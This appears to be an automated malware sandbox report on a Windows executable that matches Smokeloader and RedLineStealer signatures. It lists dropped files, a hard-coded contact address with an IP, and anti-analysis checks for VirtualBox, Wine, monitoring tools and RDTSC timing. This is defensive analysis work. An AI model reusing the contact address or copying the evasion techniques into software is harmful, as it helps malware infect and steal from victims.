Source: C:\Users\user\Desktop\tXEKP1ThBP.exeCode function: 4_3_04CD99124_3_04CD9912
Source: C:\Users\user\Desktop\tXEKP1ThBP.exeCode function: 4_3_04CCCA0F4_3_04CCCA0F
Source: C:\Users\user\Desktop\tXEKP1ThBP.exeCode function: 4_2_00402C704_2_00402C70
Source: C:\Users\user\Desktop\tXEKP1ThBP.exeCode function: 4_2_004188AA4_2_004188AA
Source: C:\Users\user\Desktop\tXEKP1ThBP.exeCode function: 4_2_0040A9604_2_0040A960
Source: C:\Users\user\Desktop\tXEKP1ThBP.exeCode function: 4_2_0040F3204_2_0040F320
Source: C:\Users\user\Desktop\tXEKP1ThBP.exeCode function: 4_2_0040D3DD4_2_0040D3DD
Source: C:\Users\user\Desktop\tXEKP1ThBP.exeCode function: 4_2_0041A3F24_2_0041A3F2
Source: C:\Users\user\Desktop\tXEKP1ThBP.exeCode function: 4_2_004143F94_2_004143F9
Source: C:\Users\user\Desktop\tXEKP1ThBP.exeCode function: 4_2_00413CE64_2_00413CE6
Source: C:\Users\user\Desktop\tXEKP1ThBP.exeCode function: 4_2_0041A5124_2_0041A512
Source: C:\Users\user\Desktop\tXEKP1ThBP.exeCode function: 4_2_0040D60F4_2_0040D60F
Source: C:\Users\user\Desktop\tXEKP1ThBP.exeCode function: 4_2_1000E1844_2_1000E184
Source: C:\Users\user\Desktop\tXEKP1ThBP.exeCode function: 4_2_100102A04_2_100102A0
Source: C:\Users\user\Desktop\tXEKP1ThBP.exeCode function: 4_2_00A9624D4_2_00A9624D
Source: C:\Users\user\Desktop\tXEKP1ThBP.exeCode function: 4_2_009148E94_2_009148E9
Source: C:\Users\user\Desktop\tXEKP1ThBP.exeCode function: 4_2_0090A01B4_2_0090A01B
Source: C:\Users\user\Desktop\tXEKP1ThBP.exeCode function: 4_2_0097F4304_2_0097F430
Source: C:\Users\user\Desktop\tXEKP1ThBP.exeCode function: 4_2_0096E83A4_2_0096E83A
Source: C:\Users\user\Desktop\tXEKP1ThBP.exeCode function: 4_2_0097BE5E4_2_0097BE5E
Source: C:\Users\user\Desktop\tXEKP1ThBP.exeCode function: 4_2_0094EA5A4_2_0094EA5A
Source: C:\Users\user\Desktop\tXEKP1ThBP.exeCode function: 4_2_008296664_2_00829666
Source: C:\Users\user\Desktop\tXEKP1ThBP.exeCode function: 4_2_0083986A4_2_0083986A
Source: C:\Users\user\Desktop\tXEKP1ThBP.exeCode function: 4_2_0086E07A4_2_0086E07A
Source: C:\Users\user\Desktop\tXEKP1ThBP.exeCode function: 4_2_00982B9A4_2_00982B9A
Source: C:\Users\user\Desktop\tXEKP1ThBP.exeCode function: 4_2_008545864_2_00854586
Source: C:\Users\user\Desktop\tXEKP1ThBP.exeCode function: 4_2_00869DAC4_2_00869DAC
Source: C:\Users\user\Desktop\tXEKP1ThBP.exeCode function: 4_2_008639CE4_2_008639CE
Source: C:\Users\user\Desktop\tXEKP1ThBP.exeCode function: 4_2_0081C9D74_2_0081C9D7
Source: C:\Users\user\Desktop\tXEKP1ThBP.exeCode function: 4_2_00980FCF4_2_00980FCF
Source: C:\Users\user\Desktop\tXEKP1ThBP.exeCode function: 4_2_0098613F4_2_0098613F
Source: C:\Users\user\Desktop\tXEKP1ThBP.exeCode function: 4_2_008FCF3E4_2_008FCF3E
Source: C:\Users\user\Desktop\tXEKP1ThBP.exeCode function: 4_2_0098472B4_2_0098472B
Source: C:\Users\user\Desktop\tXEKP1ThBP.exeCode function: 4_2_008B2B3E4_2_008B2B3E
Source: C:\Users\user\Desktop\tXEKP1ThBP.exeCode function: 4_2_00977F5E4_2_00977F5E
Source: C:\Users\user\Desktop\tXEKP1ThBP.exeCode function: 4_2_0097895D4_2_0097895D
Source: C:\Users\user\Desktop\tXEKP1ThBP.exeCode function: 4_2_0097A37C4_2_0097A37C
Source: C:\Users\user\Desktop\tXEKP1ThBP.exeCode function: 4_2_009391674_2_00939167
Source: C:\Users\user\Desktop\tXEKP1ThBP.exeCode function: 4_2_04B1F5874_2_04B1F587
Source: C:\Users\user\Desktop\tXEKP1ThBP.exeCode function: 4_2_04B2A6594_2_04B2A659
Source: C:\Users\user\Desktop\tXEKP1ThBP.exeCode function: 4_2_04B1D6444_2_04B1D644
Source: C:\Users\user\Desktop\tXEKP1ThBP.exeCode function: 4_2_04B2A7794_2_04B2A779
Source: C:\Users\user\Desktop\tXEKP1ThBP.exeCode function: 4_2_04B23F4D4_2_04B23F4D
Source: C:\Users\user\Desktop\tXEKP1ThBP.exeCode function: 4_2_04B1D8764_2_04B1D876
Source: C:\Users\user\Desktop\tXEKP1ThBP.exeCode function: 4_2_04B1ABC74_2_04B1ABC7
Source: C:\Users\user\Desktop\tXEKP1ThBP.exeCode function: 4_2_04B13B274_2_04B13B27
Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BEDT2L3A\dll[1] F1B3E0F2750A9103E46A6A4A34F1CF9D17779725F98042CC2475EC66484801CF
Source: C:\Users\user\Desktop\tXEKP1ThBP.exeCode function: String function: 04CC8FA0 appears 35 times
Source: C:\Users\user\Desktop\tXEKP1ThBP.exeCode function: String function: 04B19E07 appears 35 times
Source: C:\Users\user\Desktop\tXEKP1ThBP.exeCode function: String function: 10003160 appears 34 times
Source: C:\Users\user\Desktop\tXEKP1ThBP.exeCode function: String function: 00409BA0 appears 35 times
Source: C:\Users\user\Desktop\tXEKP1ThBP.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6624 -s 1724
Source: tXEKP1ThBP.exe, 00000004.00000003.1852170718.00000000060D6000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameY-Cleaner.exe4 vs tXEKP1ThBP.exe
Source: tXEKP1ThBP.exe, 00000004.00000003.1852696190.00000000057E1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameBunifu_UI_v1.5.3.dll4 vs tXEKP1ThBP.exe
Source: tXEKP1ThBP.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: 00000004.00000002.2242455877.0000000004B10000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
Source: 00000004.00000002.2240532857.0000000000CFA000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: Y-Cleaner.exe.4.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: soft[1].4.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: tXEKP1ThBP.exeStatic PE information: Section: skpvkuay ZLIB complexity 0.9900912325863114
Source: classification engineClassification label: mal100.evad.winEXE@2/15@0/1
Source: C:\Users\user\Desktop\tXEKP1ThBP.exeCode function: 4_2_00402950 VirtualProtect,GetLastError,FormatMessageA,LocalAlloc,OutputDebugStringA,LocalFree,LocalFree,LocalFree,4_2_00402950
Source: C:\Users\user\Desktop\tXEKP1ThBP.exeCode function: 4_2_00CFB4C6 CreateToolhelp32Snapshot,Module32First,4_2_00CFB4C6
Source: C:\Users\user\Desktop\tXEKP1ThBP.exeCode function: 4_2_00401880 HttpAddRequestHeadersA,InternetSetFilePointer,InternetReadFile,HttpQueryInfoA,CoCreateInstance,MultiByteToWideChar,MultiByteToWideChar,MultiByteToWideChar,MultiByteToWideChar,MultiByteToWideChar,4_2_00401880
Source: C:\Users\user\Desktop\tXEKP1ThBP.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BEDT2L3A\add[1].htmJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess6624
Source: C:\Users\user\Desktop\tXEKP1ThBP.exeFile created: C:\Users\user~1\AppData\Local\Temp\ws4FYw8333G101YedezSeeJump to behavior
Source: C:\Users\user\Desktop\tXEKP1ThBP.exeCommand line argument: emp4_2_00408020
Source: C:\Users\user\Desktop\tXEKP1ThBP.exeCommand line argument: mixtwo4_2_00408020
Source: C:\Users\user\Desktop\tXEKP1ThBP.exeFile read: C:\Users\desktop.iniJump to behavior
Source: C:\Users\user\Desktop\tXEKP1ThBP.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
Source: tXEKP1ThBP.exeVirustotal: Detection: 73%
Source: tXEKP1ThBP.exeReversingLabs: Detection: 57%
Source: tXEKP1ThBP.exeString found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: tXEKP1ThBP.exeString found in binary or memory: 185.156.73.23/add?substr=mixtwo&s=three&sub=emp
Source: unknownProcess created: C:\Users\user\Desktop\tXEKP1ThBP.exe "C:\Users\user\Desktop\tXEKP1ThBP.exe"
Source: C:\Users\user\Desktop\tXEKP1ThBP.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6624 -s 1724
Source: C:\Users\user\Desktop\tXEKP1ThBP.exeSection loaded: apphelp.dllJump to behavior
Source: C:\Users\user\Desktop\tXEKP1ThBP.exeSection loaded: winmm.dllJump to behavior
Source: C:\Users\user\Desktop\tXEKP1ThBP.exeSection loaded: msimg32.dllJump to behavior
Source: C:\Users\user\Desktop\tXEKP1ThBP.exeSection loaded: wininet.dllJump to behavior
Source: C:\Users\user\Desktop\tXEKP1ThBP.exeSection loaded: msvcr100.dllJump to behavior
Source: C:\Users\user\Desktop\tXEKP1ThBP.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Users\user\Desktop\tXEKP1ThBP.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Users\user\Desktop\tXEKP1ThBP.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Users\user\Desktop\tXEKP1ThBP.exeSection loaded: wldp.dllJump to behavior
Source: C:\Users\user\Desktop\tXEKP1ThBP.exeSection loaded: profapi.dllJump to behavior
Source: C:\Users\user\Desktop\tXEKP1ThBP.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Users\user\Desktop\tXEKP1ThBP.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Users\user\Desktop\tXEKP1ThBP.exeSection loaded: winhttp.dllJump to behavior
Source: C:\Users\user\Desktop\tXEKP1ThBP.exeSection loaded: mswsock.dllJump to behavior
Source: C:\Users\user\Desktop\tXEKP1ThBP.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Users\user\Desktop\tXEKP1ThBP.exeSection loaded: winnsi.dllJump to behavior
Source: C:\Users\user\Desktop\tXEKP1ThBP.exeSection loaded: urlmon.dllJump to behavior
Source: C:\Users\user\Desktop\tXEKP1ThBP.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Users\user\Desktop\tXEKP1ThBP.exeSection loaded: netutils.dllJump to behavior
Source: C:\Users\user\Desktop\tXEKP1ThBP.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Users\user\Desktop\tXEKP1ThBP.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Users\user\Desktop\tXEKP1ThBP.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Users\user\Desktop\tXEKP1ThBP.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Users\user\Desktop\tXEKP1ThBP.exeSection loaded: propsys.dllJump to behavior
Source: C:\Users\user\Desktop\tXEKP1ThBP.exeSection loaded: linkinfo.dllJump to behavior
Source: C:\Users\user\Desktop\tXEKP1ThBP.exeSection loaded: ntshrui.dllJump to behavior
Source: C:\Users\user\Desktop\tXEKP1ThBP.exeSection loaded: cscapi.dllJump to behavior
Source: C:\Users\user\Desktop\tXEKP1ThBP.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0358b920-0ac7-461f-98f4-58e32cd89148}\InProcServer32Jump to behavior
Source: Cleaner.lnk.4.drLNK file: ..\AppData\Local\Temp\ws4FYw8333G101YedezSee\Y-Cleaner.exe
Source: tXEKP1ThBP.exeStatic file information: File size 1885184 > 1048576
Source: C:\Users\user\Desktop\tXEKP1ThBP.exeFile opened: C:\Windows\SysWOW64\msvcr100.dllJump to behavior
Source: tXEKP1ThBP.exeStatic PE information: Raw size of skpvkuay is bigger than: 0x100000 < 0x19cc00

Data Obfuscation

barindex
Detected unpacking (changes PE section rights)
Source: C:\Users\user\Desktop\tXEKP1ThBP.exeUnpacked PE file: 4.2.tXEKP1ThBP.exe.400000.0.unpack :EW;.rsrc:W;.idata :W; :EW;skpvkuay:EW;mnttizsq:EW;.taggant:EW; vs .text:ER;.rdata:R;.data:W;.rsrc:R;.reloc:R;
Source: Y-Cleaner.exe.4.drStatic PE information: 0xA0CED55F [Tue Jun 29 19:19:59 2055 UTC]
Source: initial sampleStatic PE information: section where entry point is pointing to: .taggant
Source: dll[1].4.drStatic PE information: real checksum: 0x0 should be: 0x400e1
Source: tXEKP1ThBP.exeStatic PE information: real checksum: 0x1cd7cb should be: 0x1dbe72
Source: soft[1].4.drStatic PE information: real checksum: 0x0 should be: 0x170243
Source: Y-Cleaner.exe.4.drStatic PE information: real checksum: 0x0 should be: 0x170243
Source: Bunifu_UI_v1.5.3.dll.4.drStatic PE information: real checksum: 0x0 should be: 0x400e1
Source: tXEKP1ThBP.exeStatic PE information: section name:
Source: tXEKP1ThBP.exeStatic PE information: section name: .idata
Source: tXEKP1ThBP.exeStatic PE information: section name:
Source: tXEKP1ThBP.exeStatic PE information: section name: skpvkuay
Source: tXEKP1ThBP.exeStatic PE information: section name: mnttizsq
Source: tXEKP1ThBP.exeStatic PE information: section name: .taggant
Source: C:\Users\user\Desktop\tXEKP1ThBP.exeCode function: 4_3_04CDE2B5 push esi; ret 4_3_04CDE2BE
Source: C:\Users\user\Desktop\tXEKP1ThBP.exeCode function: 4_3_04CE2B88 push ss; ret 4_3_04CE2B89
Source: C:\Users\user\Desktop\tXEKP1ThBP.exeCode function: 4_2_0041FAB5 push esi; ret 4_2_0041FABE
Source: C:\Users\user\Desktop\tXEKP1ThBP.exeCode function: 4_2_00424388 push ss; ret 4_2_00424389
Source: C:\Users\user\Desktop\tXEKP1ThBP.exeCode function: 4_2_1000E891 push ecx; ret 4_2_1000E8A4
Source: C:\Users\user\Desktop\tXEKP1ThBP.exeCode function: 4_2_0099812B push 3E59FBE1h; mov dword ptr [esp], eax4_2_00998136
Source: C:\Users\user\Desktop\tXEKP1ThBP.exeCode function: 4_2_0099812B push 26EAF994h; mov dword ptr [esp], edi4_2_00998141
Source: C:\Users\user\Desktop\tXEKP1ThBP.exeCode function: 4_2_0099812B push eax; mov dword ptr [esp], esp4_2_0099C149
Source: C:\Users\user\Desktop\tXEKP1ThBP.exeCode function: 4_2_0099816B push 7F52E8E1h; mov dword ptr [esp], esi4_2_00998F01
Source: C:\Users\user\Desktop\tXEKP1ThBP.exeCode function: 4_2_0099816B push eax; mov dword ptr [esp], esi4_2_0099AF97
Source: C:\Users\user\Desktop\tXEKP1ThBP.exeCode function: 4_2_009AF098 push edi; mov dword ptr [esp], edx4_2_009AF0BC
Source: C:\Users\user\Desktop\tXEKP1ThBP.exeCode function: 4_2_009AF098 push ebx; mov dword ptr [esp], edx4_2_009AF0D1
Source: C:\Users\user\Desktop\tXEKP1ThBP.exeCode function: 4_2_009A0CB5 push esi; mov dword ptr [esp], edx4_2_009A0CD7
Source: C:\Users\user\Desktop\tXEKP1ThBP.exeCode function: 4_2_009F50AF push eax; mov dword ptr [esp], 7A412BDEh4_2_009F50D2
Source: C:\Users\user\Desktop\tXEKP1ThBP.exeCode function: 4_2_009F50AF push 6BBEB833h; mov dword ptr [esp], ebx4_2_009F512F
Source: C:\Users\user\Desktop\tXEKP1ThBP.exeCode function: 4_2_00A27CED push edi; mov dword ptr [esp], ebp4_2_00A27D2E
Source: C:\Users\user\Desktop\tXEKP1ThBP.exeCode function: 4_2_00A24421 push 3EBBEE5Ah; mov dword ptr [esp], ecx4_2_00A24443
Source: C:\Users\user\Desktop\tXEKP1ThBP.exeCode function: 4_2_00A0D830 push esi; mov dword ptr [esp], 31C0CF99h4_2_00A0D898
Source: C:\Users\user\Desktop\tXEKP1ThBP.exeCode function: 4_2_00A46C14 push esi; mov dword ptr [esp], ebp4_2_00A46C53
Source: C:\Users\user\Desktop\tXEKP1ThBP.exeCode function: 4_2_00A67466 push ebx; mov dword ptr [esp], 71EB5E6Ch4_2_00A674B7
Source: C:\Users\user\Desktop\tXEKP1ThBP.exeCode function: 4_2_00A36465 push eax; mov dword ptr [esp], 7138046Ch4_2_00A36499
Source: C:\Users\user\Desktop\tXEKP1ThBP.exeCode function: 4_2_00A36465 push ebx; mov dword ptr [esp], 5EF7C420h4_2_00A364B2
Source: C:\Users\user\Desktop\tXEKP1ThBP.exeCode function: 4_2_00A36465 push 0C6AEFC2h; mov dword ptr [esp], edi4_2_00A364C2
Source: C:\Users\user\Desktop\tXEKP1ThBP.exeCode function: 4_2_009E844E push esi; mov dword ptr [esp], 7FBFBB8Bh4_2_009E8489
Source: C:\Users\user\Desktop\tXEKP1ThBP.exeCode function: 4_2_009E844E push 1D01296Dh; mov dword ptr [esp], ecx4_2_009E84B8
Source: C:\Users\user\Desktop\tXEKP1ThBP.exeCode function: 4_2_00A5F450 push ebx; mov dword ptr [esp], ebp4_2_00A5F48D
Source: C:\Users\user\Desktop\tXEKP1ThBP.exeCode function: 4_2_009FAD8D push edi; mov dword ptr [esp], 2257023Fh4_2_009FADC1
Source: C:\Users\user\Desktop\tXEKP1ThBP.exeCode function: 4_2_00A46DB8 push 3B711981h; mov dword ptr [esp], eax4_2_00A46DDA
Source: C:\Users\user\Desktop\tXEKP1ThBP.exeCode function: 4_2_009F7DB2 push ecx; mov dword ptr [esp], eax4_2_009F7DE5
Source: C:\Users\user\Desktop\tXEKP1ThBP.exeCode function: 4_2_009F7DB2 push 3F623F19h; mov dword ptr [esp], eax4_2_009F7E3F
Source: C:\Users\user\Desktop\tXEKP1ThBP.exeCode function: 4_2_009F7DB2 push esi; mov dword ptr [esp], eax4_2_009F7E70
Source: tXEKP1ThBP.exeStatic PE information: section name: skpvkuay entropy: 7.949037345082028
Source: Y-Cleaner.exe.4.drStatic PE information: section name: .text entropy: 7.918511524700298
Source: soft[1].4.drStatic PE information: section name: .text entropy: 7.918511524700298
Source: C:\Users\user\Desktop\tXEKP1ThBP.exeFile created: C:\Users\user\AppData\Local\Temp\ws4FYw8333G101YedezSee\Bunifu_UI_v1.5.3.dllJump to dropped file
Source: C:\Users\user\Desktop\tXEKP1ThBP.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BEDT2L3A\dll[1]Jump to dropped file
Source: C:\Users\user\Desktop\tXEKP1ThBP.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\W1DLB4AP\soft[1]Jump to dropped file
Source: C:\Users\user\Desktop\tXEKP1ThBP.exeFile created: C:\Users\user\AppData\Local\Temp\ws4FYw8333G101YedezSee\Y-Cleaner.exeJump to dropped file
Source: C:\Users\user\Desktop\tXEKP1ThBP.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BEDT2L3A\dll[1]Jump to dropped file
Source: C:\Users\user\Desktop\tXEKP1ThBP.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\W1DLB4AP\soft[1]Jump to dropped file

Boot Survival

barindex
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Source: C:\Users\user\Desktop\tXEKP1ThBP.exeWindow searched: window name: FilemonClassJump to behavior
Source: C:\Users\user\Desktop\tXEKP1ThBP.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
Source: C:\Users\user\Desktop\tXEKP1ThBP.exeWindow searched: window name: RegmonClassJump to behavior
Source: C:\Users\user\Desktop\tXEKP1ThBP.exeWindow searched: window name: FilemonClassJump to behavior
Source: C:\Users\user\Desktop\tXEKP1ThBP.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
Source: C:\Users\user\Desktop\tXEKP1ThBP.exeWindow searched: window name: RegmonclassJump to behavior
Source: C:\Users\user\Desktop\tXEKP1ThBP.exeWindow searched: window name: FilemonclassJump to behavior
Source: C:\Users\user\Desktop\tXEKP1ThBP.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
Source: C:\Users\user\Desktop\tXEKP1ThBP.exeWindow searched: window name: RegmonclassJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

Malware Analysis System Evasion

barindex
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Source: C:\Users\user\Desktop\tXEKP1ThBP.exeFile opened: HKEY_CURRENT_USER\Software\WineJump to behavior
Source: C:\Users\user\Desktop\tXEKP1ThBP.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__Jump to behavior
Tries to detect virtualization through RDTSC time measurements
Source: C:\Users\user\Desktop\tXEKP1ThBP.exeRDTSC instruction interceptor: First address: 81D156 second address: 81D178 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F77004F22BEh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b pushad 0x0000000c push esi 0x0000000d pop esi 0x0000000e push edi 0x0000000f pop edi 0x00000010 popad 0x00000011 push eax 0x00000012 push edx 0x00000013 jns 00007F77004F22B6h 0x00000019 rdtsc
Source: C:\Users\user\Desktop\tXEKP1ThBP.exeRDTSC instruction interceptor: First address: 81D178 second address: 81D17C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\tXEKP1ThBP.exeRDTSC instruction interceptor: First address: 98B103 second address: 98B13C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 jng 00007F77004F22B6h 0x0000000c popad 0x0000000d push edx 0x0000000e jmp 00007F77004F22BBh 0x00000013 pop edx 0x00000014 jmp 00007F77004F22C5h 0x00000019 push eax 0x0000001a push edx 0x0000001b push ebx 0x0000001c pop ebx 0x0000001d jc 00007F77004F22B6h 0x00000023 rdtsc
Source: C:\Users\user\Desktop\tXEKP1ThBP.exeRDTSC instruction interceptor: First address: 98B13C second address: 98B140 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\tXEKP1ThBP.exeRDTSC instruction interceptor: First address: 98B140 second address: 98B16F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 pushad 0x00000008 pushad 0x00000009 jnc 00007F77004F22B6h 0x0000000f jmp 00007F77004F22C4h 0x00000014 je 00007F77004F22B6h 0x0000001a popad 0x0000001b push edx 0x0000001c pushad 0x0000001d popad 0x0000001e push eax 0x0000001f push edx 0x00000020 rdtsc
